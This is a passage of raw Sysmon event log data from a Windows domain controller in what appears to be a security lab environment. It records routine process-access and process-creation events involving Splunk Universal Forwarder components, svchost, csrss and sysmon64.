Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.593{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F2C-6005-F000-00000000A301}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.593{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:48.593{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.593{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:48.593{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.593{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:48.593{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.593{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:48.593{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.593{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.593{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8F2C-6005-F000-00000000A301}3452C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.593{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F2C-6005-F000-00000000A301}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.595{59A5CD1D-8F2C-6005-F000-00000000A301}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.155{59A5CD1D-8F2C-6005-EF00-00000000A301}7283776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.015{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F2C-6005-EF00-00000000A301}728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.015{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8F2C-6005-EF00-00000000A301}728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.015{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F2C-6005-EF00-00000000A301}728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
